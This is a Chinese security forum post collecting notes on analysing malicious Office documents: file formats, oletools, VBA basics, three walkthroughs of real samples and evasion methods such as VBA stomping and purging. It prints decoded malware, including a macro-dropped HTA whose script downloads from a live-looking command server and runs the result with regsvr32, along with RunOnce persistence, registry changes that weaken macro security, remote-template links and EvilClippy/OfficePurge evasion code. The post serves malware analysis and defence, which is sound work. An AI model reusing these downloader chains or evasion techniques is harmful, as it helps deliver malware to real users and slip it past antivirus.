安全矩阵

 找回密码
 立即注册
搜索
查看: 2937|回复: 0

office病毒分析资料整理

[复制链接]

65

主题

65

帖子

241

积分

中级会员

Rank: 3Rank: 3

积分
241
发表于 2022-5-7 20:40:28 | 显示全部楼层 |阅读模式
本帖最后由 PEnticE 于 2022-5-7 20:42 编辑

office病毒分析资料整理 (qq.com)
​office文件格式根据版本可以分为Office2007之前的版本和Office2007之后的版本。

Office2007之前的版本为OLE复合格式:doc,dot,xls,xlt,pot,ppt;

Office2007之后的版本为OpenXML格式:docx,docm,dotx,xlsx,xlsm,xltx,potx。

1、OLE复合格式(Object Linking and Embedding Data Structures)
复合文档不仅包含文本,而且包括图形、电子数据表格、声音、视频等其他信息。使用面向对象技术,将非标准信息(如图像、声音)作为独立的、自包含式对象包含在文档中。

复合文档将数据分成许多流(Steams),流存储在不同的Storages里。符合文档采用NTFS(NT File System)格式。

流又分成更小的数据扇区(sectors)。数据扇区可能包含控制数据或用户数据。

整个文件由一个头结构(Header)结构以及Sectors组成,头结构确定了Sectors的大小,每个Sector的大小相同。


使用offVis对doc文件进行解析:主要包括4个方面Header、FAT、MinFAT、DirectoryEntry。



FileHeader(文件头):固定512字节。记录了ole文件的关键信息。
结构如下图,比较重要的字段前面会标*号:struct OLEGUID {    unsigned int dw1;    unsigned short w1;    unsigned short w2;    unsigned char aby[8];}; struct FileHeader{    unsigned char sig[8];//*特征码0xD0 0xCF 0x11 0xE0 0xA1 0xB1 0x1A 0xE1    OLEGUID oleguid;//ClassID    unsigned short VerMinor;//修订号    unsigned short VerDll;//版本号    unsigned short ByteOrder;//*文档存储模式0xFE0xFF:小端。0xFF0xFE大端    unsigned short SectorShit;//*表示sector的大小。2^n    unsigned short MiniSecShift;//*MiniSector的大小。2^n    unsigned short Reserved1;//保留    unsigned int Reserved2;//保留    unsigned int NumDirSects;//*DirectorySectors目录扇区数量    unsigned int NumFatSects;//*FAT数量    unsigned int DirSect;//*Directory开始的SectorID    unsigned int TransactSig;//0    unsigned int MiniStrMax;//最小Stream的最大值,默认4096    unsigned int MiniFatSect;//*MiniFAT表开始的SectorID    unsigned int NumMiniFatSects;//*MiniFAT表数量    unsigned int DifatSect;//*DIFAT开始的SectorID    unsigned int NumDifatSects;//*DIFAT的数量    unsigned int DiFat[109];//109个DIFAT};br
FAT&MiniFATFAT为索引表结构,每一条记录中的内容是下一个扇区的地址。如下面的SECTOR[0]中记录了下一个扇区为1,SECTOR[1]中记录了下一个扇区为2,以此类推直到SECTOR[10]为一个链的结束。



特殊ID值扇区:

DirectoryEntry:复合文档中其实存放着很多内容,这么多内容需要有个目录,那么Directory就是这个目录。从Header中我们可以读取出Directory开始的SectorID,我们可以定位到这个位置(0x200 + sectorSize * dirStartSectorID)。Directory中每个DirectoryEntry固定为128字节。


  1. //office DirectoryEntry数据结构struct Element {    wchar_t Name[32];//Directory名字    unsigned short NameLength;//Name长度    unsigned char Type;//节点类型。0:非法;1:目录(storage);2:节点(Stream);5:根节点    unsigned char Flags;//节点颜色    unsigned int sidLeft;//左兄弟EntryID    unsigned int sidRight;//右兄弟EntryID    unsigned int sidChild;//孩子节点EntryID    OLEGUID ClsID;    unsigned int UserFlags;//一般为0    __int64 CreateTime;//创建时间 貌似不是时间戳的格式    __int64 ModifyTime;//文件修改时间    unsigned int StartSect;//DirectoryEntry开始的SectorID    unsigned int SizeLow;//Directory存储的所有字节长度    unsigned int SizeHigh;//保留置0};br
复制代码


2、OpenXML
Open XML是微软在Office 2007中推出的基于XML的文件格式,主要是满足文档文件被应用程序、平台和浏览器读取的能力。

新的文件格式实际上是标准的ZIP文件格式,我们可以像打开其他ZIP文件一样来打开Open XML的文档文件,里面包含着XML文件、RELS文件以及一些其他文件。

文档结构:

  1. │  [Content_Types].xml //描述文档各个部分的ContentType,协助程序解析文档│├─docProps│      app.xml//程序级别的文档属性,如:页数、文本行数、程序版本等│      core.xml//用户填写的文档属性,如:标题、主题、作者等│├─word│  │  document.xml//word文档的正文│  │  fontTable.xml//word文档的页脚│  │  settings.xml//│  │  styles.xml│  │  vbaData.xml//vba属性,是否auoopen,是否加密│  │  vbaProject.bin//记录vba工程信息 ole│  │  webSettings.xml│  ││  ├─theme│  │      theme1.xml//记录样式,颜色编号,字体大小等等│  ││  └─_rels│          document.xml.rels//文档间的关系│          vbaProject.bin.rels//记录vba文件│└─_rels        .rels//描述各个部分之间的关系br
复制代码


3、使用oletools解析安装oletools:
  1. pip install -U oletoolsbr
复制代码


3.1  分析ole文档结构工具
olebrowse:浏览器的方式查看;
olemeta:获取文档的属性数据,如作者,修改日期等;
oletimes:查询每个streams和storages的修改时间;
oledir:查询ole的directory entries信息;
olemap:查看ole文档的整体情况,如header、fat、minifat等。
3.2  分析ole病毒文档工具
oleid:检测ole文档中包含的内容,如是否被加密、是否有VBA脚本、Excel、PowerPoint、Visio、Flash;
olevba:检测提取文档中的vba脚本,--decode:解密字符串,--reveal:将源码中的混淆字符串用解密字符串代替;
mraptor:检测恶意VBA脚本。A:自动执行,W:写文件或内存,X:执行文件或payload;
msodde:检测提取DDE/DDEAUTO链接;
pyxswf:检测提取flash对象(SWF文件)。



VBA简单学习

VBA代表Visual Basic for Applications,它是一个来自Microsoft的事件驱动的编程语言。现在它主要用于MicrosoftOffice应用程序,如MSExcel,MS-Word和MS-Access。

最简单的VBA的编辑器就是office(word、excel等)。

2.1  开启vba宏
选项--->自定义功能区--->勾选开发工具


2.2  简单的vba点击开发工具--->插入--->按钮控件

右键按钮控件可以修改控件的一些属性。双击打开编辑器,输入MsgBox "Hi,VBA!"

2.3  基本概念模块:编写代码的区域。
函数:可以在程序的任何地方调用。Function和End Function关键字之间写代码。
子过程:没有返回值。在Sub和End Sub关键字之间写代码。
注释:以单引号(‘)开头或者以"REM"开头表示注释。
VBA变量&常量:
命名变量的基本规则:变量名第一个字符必须为字母;变量名不能使用的字符:空格 ! @ & $ #;变量名长度不超过255个字符;不能使用VB保留关键字作为变量名。

  1. 变量声明:Dim <<variable_name>> As <<variable_type>>常量声明Const <<constant_name>> As <<constant_type>> = <<constant_value>>br
复制代码


数字类型数据:


非数字数据类型:

VBA运算符:

算术操作符:+-*/%^(加、减、乘、除、取余、指数)比较运算符:和其他语言一样。(<>为不相等比较)逻辑运算符:AND、OR、NOT、XOR连接运算符:+和&(两个变量为数字时A=5,B=10,A+B=15,A&B=510 ;两个变量为字符串时都是拼接字符串)br
VBA条件判断和循环:

if条件判断If(expression1) Then    Statement1Elseif(expression2) Then    Statement2Elseif    Statement3End If switch语句Select Case expression   Case expressionlist1      statement1      statement2      ....      ....      statement1n   Case expressionlist2      statement1      statement2      ....      ....   Case expressionlistn      statement1      statement2      ....      ....     Case Else      elsestatement1      elsestatement2      ....      ....End Select for循环For counter = start To end [Step stepcout]    statement1    statement2    Exit ForNext for each循环For Each item In Group    statement1Next While循环While condition(s)    statemnets1Wend Do While循环Do    statements1Loop While condition(s) 中途退出for循环Exit For中途退出Do while循环Exit Dobr
VBA字符串:

VBA数组:

Dim arr(5)br
指定数组大小为5,从索引0开始,可保存6个值,且可以保存不同类型的值。

VBA事件:
可以对很多事件写代码进行处理,如SelectionChange为选择框发生改变时触发:

VBA文本文件:
文件系统对象FSO:用于对驱动器、文件夹和文件进行操作。

写入文件内容:

  1. Dim text1 As StringsSet fso = CreateObject("Scripting.FileSystemObject")Set stream = fso.OpenTextFile("F:\worksp\vba\Support.log", ForWriting, True)text1 = "text1"stream.WriteLine text1stream.Closebr
复制代码


Write命令:

  1. Dim FilePath As StringFilePath = "F:\workplace\test.txt"Open FilePath For Output As #2Dim text1 As Stringtext1 = "test1"Write #2, "test1"text1 = "text2"Write #2, "test2"Close #2MsgBox ("Write text")b
复制代码







恶意文档分析实践

为了寻找样本进行学习(不是对office的漏洞进行分析),在any.run上设置type:Microsoft office ;tag:macros或者apt。
3.1 案例一(了解一般分析方法)
样本来源:https://app.any.run/tasks/ba244852-4bad-41a4-9296-c24129ac92e1/

简单执行效果,提示linkSelectTmp.jpg不是可执行文件(存在写文件),cc服务器已经关闭。

所以最终目标:1、分析出文档具体行为。2、找到cc服务器。

linkSelectTmp.jpg打开如下图:

提取vba:提取vba脚本 olevba.exe -c .\report.06.21.doc > vba.txt。

  1. olevba 0.60 on Python 3.9.5 - http://decalage.info/python/oletools===============================================================================FILE: .\report.06.21.docType: OpenXML-------------------------------------------------------------------------------VBA MACRO ThisDocument.clsin file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -(empty macro)-------------------------------------------------------------------------------VBA MACRO procedureSize.basin file: word/vbaProject.bin - OLE stream: 'VBA/procedureSize'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Function globView(countPoint)Debug.Print Shell("" + indexClassInit("explorer "))End FunctionFunction indexClassInit(countPoint, Optional procIteratorCaption = "c:\progra", Optional nextBooleanConv = "ta")indexClassInit = countPoint & procIteratorCaption & "mdata\linkSelectTmp.h" & nextBooleanConvEnd FunctionFunction collectClassH(arr As Variant)Dim out As Stringout = ""For cnt = 1 To UBound(arr)out = out & Chr(arr(cnt) Xor 100)NextcollectClassH = outEnd Function-------------------------------------------------------------------------------VBA MACRO rightCaptReference.basin file: word/vbaProject.bin - OLE stream: 'VBA/rightCaptReference'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Sub autoopen()functionVIntegerqueryWin = globView("")End Sub-------------------------------------------------------------------------------VBA MACRO classRem.basin file: word/vbaProject.bin - OLE stream: 'VBA/classRem'- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Sub functionVInteger()Open indexClassInit("") For Output As #1Print #1, collectClassH(collectException)Close #1End SubFunction collectException()collectException = Split(ActiveDocument.Range.Text, "x")End Functionbr
复制代码


分析VBA脚本:
autoopen过程调用了functionVInteger和globView("");

functionVInteger:将文本的内容解密并写入c:\programdata\linkSelectTmp.hta;

globView:执行shell("explorer c:\programdata\linkSelectTmp.hta");

collectException:读取文档中的文本,并通过'x'进行分割为数组;

collectClassH:将数组与100进行异或解密;

indexClassInit:将字符串进行与“c:\programdata\linkSelectTmp.ht”进行拼接。


  1. html><body><div id='vbMemoryCaption'>fX17KWUoaGN0YWN9O2Vzb2xjLmVsZ25pU3lyYXJiaWw7KTIgLCJncGoucG1UdGNlbGVTa25pbFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuZWxnbmlTeXJhcmJpbDspeWRvYmVzbm9wc2VyLldrbmlMdGFkKGV0aXJ3LmVsZ25pU3lyYXJiaWw7MSA9IGVweXQuZWxnbmlTeXJhcmJpbDtuZXBvLmVsZ25pU3lyYXJiaWw7KSJtYWVydHMuYmRvZGEiKHRjZWpiT1hldml0Y0Egd2VuID0gZWxnbmlTeXJhcmJpbCByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLldrbmlMdGFkKGZpOykoZG5lcy5Xa25pTHRhZDspZXNsYWYgLCJnOFlVRjBqQ1l1NDJCRT0mWTBBWHgwTllQMk9XVWhzTGlvWVAxd2EzRGxqPWRpYyZjODU3NWl1VU1mVFp4PWVnYXAmYUNrYlZtVjdCd0RZdHV2VmxjM0J0MWtiRFQ9ZWdhcCZjRTlKUmZtSmhINVRtd1p2dktlbUNVc0k3Mj1lZ2FwJkYwQm9QOWN0MlVxeWxxNHlobnBTUlVmcURHPWhjcmFlcyZSWmptNVdYU3d3c0hQWmRTODc5PThjRFJZMUJmaSY1Z3Q0V3hhVU89cmVzdSZmN3FnaGUyNnFoUkxKcD05SWhJRj8xMXljb2YvNzA0MjIvbWdkQ29PekZNSkZ5SFFyT05vZ3RkYTQ0RHRnRGM0S0h6ZVVpVExHWC9zSHh2OTRHTi9wem5pbS8wNzcyNy9hRFQ4Lzk4NDU4L2FkZGEvbW9jLmRzYmJvaHlkYWVybGEvLzpwdHRoIiAsIlRFRyIobmVwby5Xa25pTHRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IFdrbmlMdGFkIHJhdg==aGV5OykiZ3BqLnBtVHRjZWxlU2tuaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuYlZlcnVkZWNvclBjbnVmOykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gY2lyZW5lR3JlZHJvQmVtYW4gcmF2OykibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4gPSBiVmVydWRlY29yUGNudWYgcmF2aGV5msscriptcontrol.scriptcontrol</div><div id='funcSize'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div><script language='javascript'>function lengthD(memoryText){return(new ActiveXObject(memoryText));}function intLTpl(memoryTable){return(documentTextboxListbox.getElementById(memoryTable).innerHTML);}function linkVal(){return(intLTpl('funcSize'));}function buttProcLibrary(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var windowVariantQuery=''; var w=String.fromCharCode; var L=s.length;var constC = borderMain('tArahc');for(i=0;i<64;i++){e[linkVal()[constC](i)]=i;}for(x=0;x<L;x++){c=e[s[constC](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(windowVariantQuery+=w(a));}}return(windowVariantQuery);};function borderMain(mainCount){return mainCount.split('').reverse().join('');}sizeIntLibrary = window;documentTextboxListbox = document;sizeIntLibrary.resizeTo(1, 1);sizeIntLibrary.moveTo(-100, -100);var rightHCur = documentTextboxListbox.getElementById('vbMemoryCaption').innerHTML.split("aGV5");var bytesLZero = borderMain(buttProcLibrary(rightHCur[0]));var arrMemory = borderMain(buttProcLibrary(rightHCur[1]));var pointerInteger = rightHCur[2];</script><script language='vbscript'>Function viewDelVar(vbMemoryCaption)Set screenTrustConst = CreateObject(pointerInteger)With screenTrustConst.language = "jscript".timeout = 360000End WithscreenTrustConst.eval(vbMemoryCaption)End Function</script><script language='vbscript'>Call viewDelVar(bytesLZero)</script><script language='vbscript'>Call viewDelVar(arrMemory)</script><script language='javascript'>sizeIntLibrary['close']();</script></body></html>br
复制代码



第一段加密代码分析,加密的数据如下:

得到的hta数据:

1、从vbMemoryCaption中获取数据并按"aGV5"进行分割得到rightHCur数组;

2、buttProcLibrary函数根据uncSize中的字母表,进行base64解密;

3、bytesLZero 为rightHCur[0],base64解密并翻转;

4、arrMemory为rightHCur[1],base64解密并翻转,得到最后的脚本。


  1. var datLinkW = new ActiveXObject("msxml2.xmlhttp");datLinkW.open("GET", "http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g", false);datLinkW.send();if (datLinkW.status == 200) {    try {        var librarySingle = new ActiveXObject("adodb.stream");        librarySingle.open;        librarySingle.type = 1;        librarySingle.write(datLinkW.responsebody);        librarySingle.savetofile("c:\\users\\public\\linkSelectTmp.jpg", 2);        librarySingle.close;    } catch(e) {}} var funcProcedureVb = new ActiveXObject("wscript.shell");var nameBorderGeneric = new ActiveXObject("scripting.filesystemobject");funcProcedureVb.run("regsvr32 c:\\users\\public\\linkSelectTmp.jpg");br
复制代码



第二段加密代码分析:

1、访问目标网站,将得到的内容保存导入
c:\users\public\linkSelectTmp.jpg中

2、执行regsvr32c:\users\public\linkSelectTmp.jpgregsvr32.exe用于注册和取消注册Windows操作系统的DLL(动态链接库)文件和ActiveX控件。

因为网站已经404,所以linkSelecTmp.jpg内容并不是dll或者activeX控件。


小结:

1、doc文档打开自动执行解密并写入c:\programdata\linkSelectTmp.hta;

2、linkSelectTmp.hta解密vb脚本向;



  1. <code>http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?</code>
复制代码


3、linkSelectTmp.hta执行“regsvr32 c:\users\public\linkSelectTmp.jpg”。
3.2  案例二(了解如何动态调试)
https://app.any.run/tasks/c9662466-6463-42b4-ba14-5dfb41a7f44b/#

在文档关闭的时候会自动关闭,所以优先关注Sub Document_Close():

使用oledump提取vba脚本,有很多注释语句,变量名也被混淆了,正好是个不错的样本,需要动态调试查看。


动态调试查看,点击视图开启立即窗口、本地窗口和监视窗口。



SetnZsXAIAmrwsMOxkvh=gxUVYeacLIkNroPKoYAd.CreateTextFile(oCHIUZS, True, True)。

创建了一个文件,直接查看比较麻烦,通过设置断点,查看变量的方法可以容易的知道创建的文件为"C:\Users\abel\Downloads\deer.ini",后续要关注这个文件。



接着上面就是大量的字符串拼接,之后应该会进行解密写文件操作,可以跳过这段代码下断点。


UNMfYyPswUtPDcyphmZwEXyU先对字符串进行了base64的解密,再写入到了“C:\Users\abel\Downloads\deer.ini”文件中。

执行生成的vba脚本:

  1. Set oShell = CreateObject("Shell.Application")CallByName oShell, "ShellExecute", VbMethod, "wscript.exe", "C:\Users\abel\Downloads\deer.ini //e:VBScript //b", "", "", 0br
复制代码



最后写注册表:
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\deer", "wscript.exeC:\Users\abel\Downloads\deer.ini //e:VBScript //b", "REG_SZ"。

实现自启。

deer.ini分析:创建一个word,启动visualBasic编辑器,并将beer.ini的内容复制进去。

首先创建了一个字符串"C:\Users\abel\deer.exe":

写注册表:

  1. HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM为1HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarningsbr
复制代码



使用WMI测试是否能ping通coagula.online:


  1. "SELECT * FROM Win32_PingStatus WHERE Address=" + "'coagula.online'"br
复制代码



可以使用debug.print调试输出url,得到一个url“http://83.166.240.31/get.php?independent=”。


可惜这个url已经关闭了,没法继续往下分析。

小结:
(1)word解密释放C:\Users\abel\Downloads\deer.ini(vbs脚本);

(2)设置注册表:
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\deer",设置自启deer.ini;

(3)启动deer.ini;

(4)设置两个注册表:
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM;

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings;

(5)获取coagula.online的ip;

(6)访问http://83.166.240.31/get.php?independent=,获deer.exe内容(猜测):对于提取到的vb代码可以新建文档动态调试。

3、案例三(模板注入的病毒)
https://app.any.run/tasks/63e3f841-6c52-454f-9d03-9d02883100ae/#

众所周知docx的文档是没有宏是安全的(漏洞除外),所以docx这类不存在宏的文档就安全了吗?这里还是从any.run上找了一个apt标签的office文档(因为apt标签用这个技术的比较多)。

使用olevba进行查看并没有vba脚本,但是oleid显示存在External Relationships:

oleobj可以检测到一个外部链接http://pokis-to.hopto.org/18FAB3F7/TKvrzJNE.dot 。当docx文档启动的时候会加载使用该dot文档。链接已经失效,后续分析也没有了。

./word/_rels/settings.xml.rels中找到了可疑链接。rels文件指定了各个部件之间的关系。Target表示零件的文件位置,正常情况使用的是相对路径。


四1

office病毒常见的隐藏和反调试方法

office病毒除了上面的混淆等方法,还有什么方法可以对抗检测和分析呢?

4.1  源码、p-code和exe-code
vba宏代码有3个存储的地方:源代码、pcode区和execode区。用Structured Storage Viewer打开只有下面最简单宏的doc文件:



源代码:宏的原代码被压缩保存,是vba模块流的末尾,可以使用'Attribut'字符串轻松识别。

pcode:存储的是pcode伪代码,是vba宏代码被vba编辑器编译之后的代码。

execode:只要在pcode代码至少执行一次之后才会出现,存储的是pcode执行的痕迹。execode代码存储在SRP_目录中。

_VBA_PROJECT和SRP_#流:版本和实现信息。

存在三个代码区域,那么什么情况下会执行对应的代码呢?
正常情况只会执行源码和p-code。
pcode:office版本和vba编辑器相同时,使用pcode(pcodedmp提取pcode代码);
源码:office或者vba版本不同时,使用源码执行;
exe-code:是pcode的执行记录,不会被执行,但是具备独立执行的条件。

4.2  VBA stomping
针对上面的pcode和源码在不同条件下的执行优先顺序,提出了不同的攻击方法。

将恶意的源码与非恶意的VBA源码进行交换,保留p-code不变。攻击能够成功取决于office版本,office版本和目标的office版本相同时,office会优先执行p-code中的代码。

可以使用https://github.com/outflanknl/EvilClippy工具完成这个过程。先创建一个包含一个模块abcdefg模块的doc文档,打开时自动弹窗。

HelloWorld:

创建一个非恶意的fakeMssage.vba:

  1. Sub autoopen()MsgBox "fakeMessage"Sub Endbr
复制代码



使用EvilClippy替换原来doc中的源码,得到doc_EvilClippy_stomping.doc文件。


  1. EvilClippy.exe -n abcdefg -n ThisDocument -s fakevba.vba doc.docbr
复制代码



使用word查看效果,vba编辑器仍然能看到源码,因为当vba执行时,office会根据p-code修复源码。


使用Structured Storages Viewer查看,可以看到源码内容已经被修改。



使用olevba对doc_EvilClippy_stomping.doc进行查看,分析得到的vba代码已经出错。pcode部分还是能看到源码正常,且已经提示存在vba stoming。

oledump工具提示7,13报错:

pcodedmp分析:

可以使用pcode2code库来提取源码:

小结:
VBA stoming方法主要是针对一些自动检测工具进行干扰,降低杀软报毒的可能性,对于手动分析没有干扰效果。

4.3  VBA purging
与VBA stomping相反,VBA purging保留了源码,删除了p-code及相关部分。

从模块流和_VBA_PROJECT流中删除Pcode,将MODULEOFFSET的值更改为0,并删除所有SRP流。更容易绕过AV检测和YARA规则(导致一些分析工具失效,貌似对手动分析并没影响),

可以使用https://github.com/fireeye/OfficePurge完成相关操作。

如何实现vbapurging的操作呢?(阅读https://github.com/fireeye/OfficePurge源码)

1、读取“dir”的流内容,并解压。

2、解析“dir”流内容解析出module的名字和源码的offset。(比如doc.doc中abcdefg模块的偏移为1307)



3、循环提取源码到OG_VBACode,移除pcode,再重新设置VBA中对应模块源码。(如下源码)


  1. // Get the CompressedSourceCode from module  streamBytes = commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).GetData();string OG_VBACode = Utils.GetVBATextFromModuleStream(streamBytes, vbaModule.textOffset);// Remove P-code from module stream and set the module to only have the CompressedSourceCodestreamBytes = Utils.RemovePcodeInModuleStream(streamBytes, vbaModule.textOffset, OG_VBACode);commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).SetData(streamBytes);br
复制代码



4、修改dir流中module的偏移为0。

5.设置_VBA_PROJECT为"CC-61-FF-FF-00-00-00"。

6.删除__SRP_*的流。


  1. // Change offset to 0 so that document can find compressed source code.commonStorage.GetStorage("VBA").GetStream("dir").SetData(Utils.Compress(Utils.ChangeOffset(dirStream)));Console.WriteLine("\n[*] Module offset changed to 0."); // Remove performance cache in _VBA_PROJECT stream. Replace the entire stream with _VBA_PROJECT header.byte[] data = Utils.HexToByte("CC-61-FF-FF-00-00-00");commonStorage.GetStorage("VBA").GetStream("_VBA_PROJECT").SetData(data);Console.WriteLine("\n[*] PerformanceCache
复制代码

  1. removed from _VBA_PROJECT stream."); // Check if document contains SRPs. Must be removed for VBA Purging to work.try{    commonStorage.GetStorage("VBA").Delete("__SRP_0");    commonStorage.GetStorage("VBA").Delete("__SRP_1");    commonStorage.GetStorage("VBA").Delete("__SRP_2");    commonStorage.GetStorage("VBA").Delete("__SRP_3");    Console.WriteLine("\n[*] SRP streams deleted!");}br
复制代码



_VBA_PROJECT长度只有7个字节时优先考虑是否为vba_purging。


Hiding macros:当文档运行p-code时,VBA引擎会根据p-code修复源码。所以只要p-code运行,使用vba编辑器查看到的就还是源码。
如下图将doc的源码进行了替换,但是用word打开时还是原来的代码。有没有什么办法能阻碍分析人员通过vba编辑器查看和动态调试呢?



EviClippy可以使用-g参数隐藏vba源码。

Hiding macros原理:通过查看EviClippy的相关代码,可以知道-g参数主要是对将PROJECT流中的"Module=abcdefg\x0D\x0A"删除并重新保存。(使用FlexHEX,直接用010editor会导致vba失效)




  1. // Hide modules from GUIif (optionHideInGUI){    foreach (var vbaModule in vbaModules)    {        if ((vbaModule.moduleName != "ThisDocument") && (vbaModule.moduleName != "ThisWorkbook"))        {            Console.WriteLine("Hiding module: " + vbaModule.moduleName);            projectStreamString = projectStreamString.Replace("Module=" + vbaModule.moduleName, "");        }    }     // Write changes to project stream    commonStorage.GetStream("project").SetData(Encoding.UTF8.GetBytes(projectStreamString));}br
复制代码


查看效果:能够成功执行vba代码,但是vba编辑器看不到对应的。


本文大部分内容为收集整理,参考链接在文章最后面。

参考文章:1、文档结构相关
(官方文档)[MS-OLEDS]: Object Linking and Embedding (OLE) Data Structures
https://docs.microsoft.com/enus/ ... e-a35f-d6701c5fbb6f

Office文件的奥秘——.NET平台下不借助Office实现Word、Powerpoint等

文件的解析(一)
https://www.cnblogs.com/mayswind/archive/2013/03/17/2962205.html

office 复合文档数据结构解析“初探”
https://blog.csdn.net/Cody_Ren/article/details/103886098
Tools to extract VBA Macro source code from MS Office Documents
http://www.decalage.info/en/vba_tools

复合文档的二进制存储格式研究[ole存储结构]整理
https://blog.csdn.net/chaoguodong/article/details/80402291

恶意Office文档解析——1. Office文档格式解析
https://blog.csdn.net/qq_42855619/article/details/92852284

oletools百科
https://github.com/decalage2/oletools/wiki

VBA教程
https://www.yiibai.com/vba

2、office病毒分析相关

宏病毒的研究与实例分析01——基础篇
https://blog.csdn.net/qq_3847457 ... 1001.2014.3001.5501

(推荐)【恶意代码分析技巧】08-文档宏病毒
https://www.sec-in.com/article/67

浅析恶意office文档检测技术
https://www.secrss.com/articles/10705

word文档宏病毒样本分析
https://www.52pojie.cn/thread-1287476-1-1.html

一例加密保护Excel的vba宏病毒下载器分析
https://www.52pojie.cn/thread-1298869-1-1.html

3、office病毒隐藏相关

(推荐)Evil Clippy原理
https://outflank.nl/blog/2019/05 ... e-maldoc-assistant/

(推荐)OfficePurge工具
https://github.com/fireeye/OfficePurge

Pcode与VBA Stomping
https://www.yuque.com/p1ut0/qtmgyx/mbwnvq

Oficepurge原理
https://www.fireeye.com/blog/thr ... th-vba-purging.html

最后提供一下实验用的样本解压密码:bbs.pediy.com。

test文件夹为最简单的宏的doc,用于测试特性和工具;样本文件夹为any.run下载样本,解压密码infected。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 06:34 , Processed in 0.018289 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表